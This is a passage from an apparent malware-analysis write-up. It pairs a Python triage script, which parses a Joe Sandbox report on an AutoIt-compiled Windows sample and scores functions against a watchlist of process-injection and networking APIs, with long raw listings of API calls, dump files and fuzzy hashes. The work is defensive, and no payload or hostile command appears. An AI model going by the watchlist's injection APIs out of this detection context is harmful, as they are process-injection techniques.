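    • Opcode ID: 249501f8a4e580636a4acd794e0155116606d89fbde6ff38d92024650ff3dce5
"""

ApiCall = namedtuple("ApiCall", "name module args ref parent")  # parent: subcall address, or None
# "Name.MODULE(args), ref: ADDR", or the paren-less "Name.MODULE ref: ADDR" form used for CRT calls
API_CALL = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-F]+)$"
)
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LINK_RESIDUE = "Download File"  # link text the HTML export fuses onto "Associated:" lines

def parse_records(text):
    """One dict per "APIs" block: {"calls": [ApiCall, ...], "fields": {"API ID": ..., ...}}."""
    records, record, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().removesuffix(LINK_RESIDUE).rstrip()
        if line == "APIs":
            record = {"calls": [], "fields": {}}
            records.append(record)
        if line in SECTIONS:
            section = line
        elif record is not None and line.startswith("• "):
            entry = line[2:]
            if section == "APIs":
                m = API_CALL.match(entry)
                if m:
                    args = tuple(a for a in (m["args"] or "").split(",") if a)
                    record["calls"].append(ApiCall(m["name"], m["module"], args, m["ref"], m["parent"]))
            elif ":" in entry:  # "Key: value"; a repeated key such as Associated keeps its last value
                key, value = entry.split(":", 1)
                record["fields"][key.strip()] = value.strip()
    return records

# Analyst's watchlist (an assumption, not from the report): the AutoIt GUI runtime's USER32/GDI32
# calls score 0, so network and process-manipulation imports rise to the top of the listing.
MODULE_WEIGHT = {"WININET": 3, "WSOCK32": 3, "WS2_32": 3, "NTDLL": 2}
API_WEIGHT = {"InternetSetOptionW": 2, "inet_addr": 1, "WriteProcessMemory": 5,
              "SetThreadContext": 5, "QueueUserAPC": 5, "NtMapViewOfSection": 5}

def score(record):
    """Sum of the weights of a function's calls; calls made inside a subcall count half."""
    total = 0
    for c in record["calls"]:
        w = MODULE_WEIGHT.get(c.module, 0) + API_WEIGHT.get(c.name, 0)
        total += w if c.parent is None else w // 2
    return total

def triage(text):
    """(score, API ID, names of the function's own calls) per record, most interesting first."""
    rows = [(score(r), r["fields"].get("API ID", "?"), [c.name for c in r["calls"] if c.parent is None])
            for r in parse_records(text)]
    return sorted(rows, key=lambda row: row[0], reverse=True)

def cluster_by_api_string_id(records):
    """Opcode IDs of functions that share an 'API String ID' (same API set and same string)."""
    groups = defaultdict(list)
    for f in (r["fields"] for r in records if "API String ID" in r["fields"]):
        groups[f["API String ID"]].append(f.get("Opcode ID"))
    return {k: v for k, v in groups.items() if len(v) > 1}
```

Saved as a text file, the whole section parses the same way as SAMPLE, with `triage()` putting the Internet$OpenOption and htonsinet_addr functions first and the SendMessageW, GetMenuItemInfoW and __snwprintf functions (the `$$AUTOITCALLVARIABLE%d` format string is the AutoIt interpreter's own) at zero. A score is a pointer to a function worth opening in the dump, not a verdict: IsProcessorFeaturePresent(0x17) followed by ___raise_securityfailure is the MSVC /GS stack-cookie failure handler testing for PF_FASTFAIL_AVAILABLE, and the 255.255.255.255 string beside inet_addr is consistent with the usual check that separates a real broadcast address from inet_addr's INADDR_NONE error value rather than with a hard-coded destination; confirm either in the dump before reporting it.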
                                                                  APIs
                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0038B7EF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 3850602802-1403004172
                                                                  • Opcode ID: 96a37487ba37bb2b00751a6fd5df91cd34bf214d0f7be17c580bbce93b1279ba
                                                                  • Instruction ID: 0d3244c9469310fe25d185d3f3aca2e3975555bb68ccde057dc7e3695ce34171
                                                                  • Opcode Fuzzy Hash: 96a37487ba37bb2b00751a6fd5df91cd34bf214d0f7be17c580bbce93b1279ba
                                                                  • Instruction Fuzzy Hash: 9701F171650315AFCB06FBA4CC52DFEB36DAF06314B10061AF8626B2D2EBB459088B90
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 0038B6EB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 3850602802-1403004172
                                                                  • Opcode ID: b30089619e52dcaf478273e19b259a853c8783c3133efb02b7e5bb15b2eb7e2c
                                                                  • Instruction ID: 4a436d5f3fa773c636b6c38a802a48a47bcddb428d5536f674d794ef78e64954
                                                                  • Opcode Fuzzy Hash: b30089619e52dcaf478273e19b259a853c8783c3133efb02b7e5bb15b2eb7e2c
                                                                  • Instruction Fuzzy Hash: 800184716412056FCB06FBA4C953FFEB3AC9B05345F10006AB402772D1EB945E1887A5
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 0038B76C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 3850602802-1403004172
                                                                  • Opcode ID: b1d1ec63d8495eec81076091fe45177a917eb110e4feff1b1367fe66960b82fc
                                                                  • Instruction ID: 909c510243cf6c21a779e3fa91ad3518c6dad5662750683793bdd14b292b4fb3
                                                                  • Opcode Fuzzy Hash: b1d1ec63d8495eec81076091fe45177a917eb110e4feff1b1367fe66960b82fc
                                                                  • Instruction Fuzzy Hash: 0B01A271641305ABCB02F7A4CA13FFEB3AC9F05345F50002AB801B71E2DBA45E0987B5
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __calloc_crt
                                                                  • String ID: "A
                                                                  • API String ID: 3494438863-1113105338
                                                                  • Opcode ID: 364ee3aff3ea527ab6b326c6dcfcb017f4c2b5aef94e5a1048640e1377c02c0c
                                                                  • Instruction ID: 8816099162daf91d1b9d69747e6f50a0a381c0475f55cbf19b46d50abe7dfcd5
                                                                  • Opcode Fuzzy Hash: 364ee3aff3ea527ab6b326c6dcfcb017f4c2b5aef94e5a1048640e1377c02c0c
                                                                  • Instruction Fuzzy Hash: 4DF028302087028EE3368F18BD416AA67D4E701720F10C17BF208DE186E7BCD851479C
                                                                  APIs
                                                                  • LoadImageW.USER32(00350000,00000063,00000001,00000010,00000010,00000000), ref: 00354048
                                                                  • EnumResourceNamesW.KERNEL32(00000000,0000000E,003967E9,00000063,00000000,75A50280,?,?,00353EE1,?,?,000000FF), ref: 003C41B3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: EnumImageLoadNamesResource
                                                                  • String ID: >5
                                                                  • API String ID: 1578290342-4081535938
                                                                  • Opcode ID: 79a7300a09632e30fc89b0ba560d05cc52c82ed2ea3026259ac007d84383fad2
                                                                  • Instruction ID: 522366c239e12fd221530eb7f2b8d938aebe7b98a38b6fa398881fe607d8d0fd
                                                                  • Opcode Fuzzy Hash: 79a7300a09632e30fc89b0ba560d05cc52c82ed2ea3026259ac007d84383fad2
                                                                  • Instruction Fuzzy Hash: F3F06D31A41325B7E6214B1ABC4AFD67FADA709BB5F108516F714AB1F0D2F095808A98
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ClassName_wcscmp
                                                                  • String ID: #32770
                                                                  • API String ID: 2292705959-463685578
                                                                  • Opcode ID: 18df445991bc8b6c200514d1d991284914ea61688964dde163324ad989a323b3
                                                                  • Instruction ID: 52f59a2b5c0ccc6acf1b1f198a1dd7724f77a3bf9958800b281e5848cd3ebd5e
                                                                  • Opcode Fuzzy Hash: 18df445991bc8b6c200514d1d991284914ea61688964dde163324ad989a323b3
                                                                  • Instruction Fuzzy Hash: BEE0223360022827DB20EBA9AC09FC7FBACEB91B60F000026B904E3081D670E60087E8
                                                                  APIs
                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0038A63F
                                                                    • Part of subcall function 003713F1: _doexit.LIBCMT ref: 003713FB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Message_doexit
                                                                  • String ID: AutoIt$Error allocating memory.
                                                                  • API String ID: 1993061046-4017498283
                                                                  • Opcode ID: 037fcc292433bfccd74c6b74554e61f7df7a6dfe1f0f0908e072e823f4d6c846
                                                                  • Instruction ID: 6cd767c6ed86069e238fa0c34942203cf857ca83d0b0ef4b93ca783dde994e02
                                                                  • Opcode Fuzzy Hash: 037fcc292433bfccd74c6b74554e61f7df7a6dfe1f0f0908e072e823f4d6c846
                                                                  • Instruction Fuzzy Hash: D0D012323C572836D21636997C1BFD5764C8B15B51F144026FB0CA95D259E6994042D9
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 003CACC0
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 003CAEBD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryFreeLibrarySystem
                                                                  • String ID: WIN_XPe
                                                                  • API String ID: 510247158-3257408948
                                                                  • Opcode ID: 74a4cb22e3f2e4787cd3e62c85437719f396c9ed05fce17a06d9eaea0b44c74a
                                                                  • Instruction ID: 56871dca07436ef6ac1e58af42e3da02f6bb6b73ba120645c46d50790c3e07f2
                                                                  • Opcode Fuzzy Hash: 74a4cb22e3f2e4787cd3e62c85437719f396c9ed05fce17a06d9eaea0b44c74a
                                                                  • Instruction Fuzzy Hash: 5FE0C970C04909AFCB12DBA9D944EECB7BCAB48709F14C09AE112F2560DB705E84DF26
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003B86A2
                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003B86B5
                                                                    • Part of subcall function 00397A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00397AD0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: b0fbd46193ea9d539b3ddb4eeb633fae597e72fc2033186160c839e0e1a55bca
                                                                  • Instruction ID: 545b7b7621b65ca7db5a5aeba497f5ce9e69c60a8a31c29e4e1acedddbefba6f
                                                                  • Opcode Fuzzy Hash: b0fbd46193ea9d539b3ddb4eeb633fae597e72fc2033186160c839e0e1a55bca
                                                                  • Instruction Fuzzy Hash: 22D01231395314B7E6696770BC0BFCA7F1C9B04B22F100816B749AA1D0C9F4E940C758
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003B86E2
                                                                  • PostMessageW.USER32(00000000), ref: 003B86E9
                                                                    • Part of subcall function 00397A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00397AD0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: a9b55ad9ae396ef7f7caff07deeeb9fcfb32799cc0f85804ed57e20819d24533
                                                                  • Instruction ID: c96781e313debca0af79fb1b8e14a767df39e9a6fbefc130e1c638144de957e4
                                                                  • Opcode Fuzzy Hash: a9b55ad9ae396ef7f7caff07deeeb9fcfb32799cc0f85804ed57e20819d24533
                                                                  • Instruction Fuzzy Hash: CBD012313863147BF66A6770BC0BFCA7B1C9B05B22F500816B745EA1D0C9F4E940C758